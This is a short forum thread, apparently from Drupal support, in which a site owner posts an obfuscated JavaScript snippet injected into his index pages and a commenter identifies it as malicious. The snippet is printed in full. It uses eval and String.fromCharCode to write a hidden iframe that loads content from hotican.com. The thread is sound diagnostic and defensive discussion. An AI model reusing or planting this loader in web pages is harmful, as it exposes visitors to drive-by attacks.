HI,
I recently notice a piece of code in my pages. I was wondering if anyone has seen this. It appears to be an injected javascript. Here's the code:
echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,104,111,116,34,59,118,97,114,32,119,61,34,105,34,59,118,97,114,32,114,101,54,61,34,99,97,110,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))</script>';
It is bizarre and appears only in all my index.html and index.php pages. Please let me know if anyone has seen this and what you think it might be. Is it an attack of some kind? Thanks.
--Jimmy
Comments
Comment #1
grobemo commentedIt seems malicious to me. Delete it. You may also want to contact the security team to report the problem, especially if it reappears and/or if you're using the latest version of Drupal.
It's printing an <iframe> to your page. Here's the JavaScript it's evaluating, decoded:
The iframe, which will be virtually invisible on your page, points to hotican.com, which appears to try to load a PDF. (I don't know what the PDF is. I haven't opened it.)
Comment #2
dpearcefl commentedDoesn't look like a Drupal problem.